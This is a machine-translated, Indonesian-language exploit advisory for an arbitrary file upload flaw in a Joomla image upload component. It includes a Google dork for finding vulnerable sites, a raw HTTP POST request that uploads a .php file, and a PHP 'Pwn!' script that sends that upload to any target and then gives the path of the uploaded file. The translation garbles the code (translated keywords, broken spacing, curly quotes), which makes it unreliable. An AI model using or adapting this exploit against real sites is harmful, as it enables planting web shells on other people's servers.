Joomla Sederhana Gambar Upload Sewenang Upload File
# Exploit Judul: Joomla Sederhana Gambar Upload - Sewenang Upload File
# Google Dork: inurl: option = com_simpleimageupload
# Tanggal: 2015/06/23
# Exploit Penulis: CrashBandicotDosPerl
# Penjual Homepage: http://tuts4you.de/
# Software Link: http://tuts4you.de/96-development/156-simpleimageupload
# Versi: 1.0
# Diuji pada: MsWin32
# Vuln Sama untuk Com_Media Kerentanan
# Hidup Permintaan:
POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc HTTP / 1.1
Host: 127.0.0.1
User-Agent: Mozilla / 5.0 (Windows NT 6.1; rv: 31.0) Gecko / 20100101 Firefox / 31.0
Terima: text / html, aplikasi / xhtml + xml, aplikasi / xml; q = 0,9, * / *; q = 0,8
Terima-Bahasa: en-us, en; q = 0,5
Terima-Encoding: gzip, mengempis
Referer: http://127.0.0.1/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc
Koneksi: terus-hidup
Content-Type: multipart / form-data; batas = --------- 247062787817068
---------- 247062787817068 \ r \ n
Content-Disposition: form-data; name = "Filedata"; filename = "L0v3.php." \ r \ n
Content-Type: application / x-php \ r \ n
\ r \ n
0wn3d! ;) \ r \ n
---------- 247062787817068 \ r \ n
Content-Disposition: form-data; name = "kembali-url" \ r \ n
\ r \ n
aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=\r\n
---------- 247062787817068- \ r \ n
# Exploit:
<? php
gema '<form action = metode "#" = "post" enctype = "multipart / form-data">
<input type = "text" name = "target" value = "www.localhost.com" /> <input type = "submit" name = "Pwn" value = "Pwn!" />
</ form> ';
if ($ _ POST) {
$ target = $ _POST ['target'];
$ file = "0wn3d! ;) ";
$ sundulan = array ("Content-Type: application / x-php",
"Content-Disposition: form-data; name = \ "Filedata \"; file = \ "L0v3.php \." ");
$ ch = curl_init(“http://”.$target.”/index.php?option=com_simpleimageupload&task=upload.upload&tmpl=component”);
curl_setopt ($ ch, CURLOPT_POST, true);
curl_setopt ($ ch, CURLOPT_USERAGENT, "Mozilla / 5.0 (Windows NT 6.3; WOW64) AppleWebKit / 537,36 (KHTML, seperti Gecko) Chrome / Safari 43.0.2357.124 / 537,36");
curl_setopt ($ ch, CURLOPT_POSTFIELDS, array ('Filedata' => "@ $ file", "kembali-url" => “aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=”,));
curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ ch, CURLOPT_HTTPHEADER, $ header);
$ hasil = curl_exec ($ ch);
curl_close ($ ch);
mencetak "$ hasil";
} Else {die (); }
?>
# Jalur File: 127.0.0.1/images/[Rand0mString]L0v3.php
# Sh00t untuk Mr_AnarShi-T;
Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.